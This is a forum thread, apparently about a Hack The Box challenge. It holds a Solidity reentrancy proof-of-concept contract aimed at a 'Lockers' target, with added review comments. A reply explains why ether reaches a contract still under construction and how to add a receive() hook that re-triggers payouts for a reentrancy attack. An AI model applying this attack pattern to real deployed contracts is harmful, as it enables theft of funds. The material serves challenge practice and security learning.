Hi guys, I wanted to write a PoC for a reentrancy attack, but somehow it's not working, and it's strange that this contract is receiving ether even without any receive or fallback function.
How can that be possible?
pragma solidity ^0.8.13;
/// Minimal interface for the target "Lockers" contract, declaring only the three
/// external functions this listing calls. The implementations are not shown here,
/// so what each call does on the target is unknown from this page.
// NOTE(review): the arguments named `password` are plain `string calldata`. Calldata
// is publicly readable on-chain, so a value passed this way cannot serve as a secret.
// Presumably the target uses it for authentication; confirm against the target source.
interface ILockers {
// Called in this listing with an item name and a password.
function sellItem(string calldata name, string calldata password) external;
// Called in this listing with a username and a password.
function getLocker(string calldata username, string calldata password) external;
// Called in this listing with an item name, an owner name and a uint8 rarity.
function putItem(string calldata name, string calldata owner, uint8 rarity) external;
}
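/// @title ReentrancyAttack: proof-of-concept contract as posted in the thread
/// @notice Runs a fixed sequence of calls against an ILockers target from inside the
///         constructor, then records the target's balance.
/// @dev Points a reviewer of the *target* contract should take from this listing:
///      1. While a constructor is executing, the new address has no runtime code yet:
///         `address.code.length` is 0, and a plain ether transfer to that address
///         succeeds without any receive()/fallback() being run. That is why this
///         contract ends up holding ether although it declares neither function.
///      2. A check of the form "caller has no code, so it is an externally owned
///         account" therefore does not hold for callers that are mid-construction and
///         must not be relied on as a reentrancy or bot defence. The robust
///         mitigations on the target side are updating state before sending ether
///         (checks-effects-interactions) and a reentrancy guard.
///      Change from the posted version: withdraw() was callable by any account and
///      would hand the whole balance to whoever called it first; it is now limited to
///      the deployer.
contract ReentrancyAttack {
    ILockers public lockersContract;
    address public target;
    // Balance of `target` as observed at the end of the constructor.
    uint public bal;
    // Deployer of this contract; the only account allowed to call withdraw().
    address public immutable owner;

    // Trace event used to see how far the constructor progressed.
    event debug(string pos, uint num);

    /// @param _lockersContractAddress Address of the deployed ILockers target.
    constructor(address _lockersContractAddress) {
        owner = msg.sender;
        lockersContract = ILockers(_lockersContractAddress);
        target = _lockersContractAddress;
        emit debug("Constructor", 11);
        emit debug("attack", 11);
        // The three calls below go to the target while this contract still has no
        // code, so any ether the target sends back is accepted silently and no code
        // of this contract runs in response.
        lockersContract.getLocker("xyz1", "abc");
        emit debug("attack", 12);
        lockersContract.putItem("htb", "xyz1", 2);
        emit debug("attack", 13);
        emit debug("attack", 14);
        lockersContract.sellItem("htb", "abc");
        emit debug("attack", 15);
        bal = target.balance;
    }

    /// @notice Send this contract's entire ether balance to the deployer.
    /// @dev Reverts for any caller other than `owner`; without this check the funds
    ///      could be taken by the first account to call the function.
    function withdraw() public {
        require(msg.sender == owner, "not owner");
        payable(msg.sender).transfer(address(this).balance);
    }
}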
Jan 17, 2024, 3:37 AM
I used Remix.
Jan 17, 2024, 3:37 AM
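That's because you call the functions that send you ether in the constructor. Contracts under construction return 0 for account.code.length. Since there is no code at the address yet, the ether transfer succeeds without any receive or fallback function being executed.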
In order to do reentrancy, you should define a receive() function in the attack contract and put there the logic you want to execute when the contract receives ether (for example, triggering the function that sends you ether again until some criterion is met).
Jan 17, 2024, 7:55 AM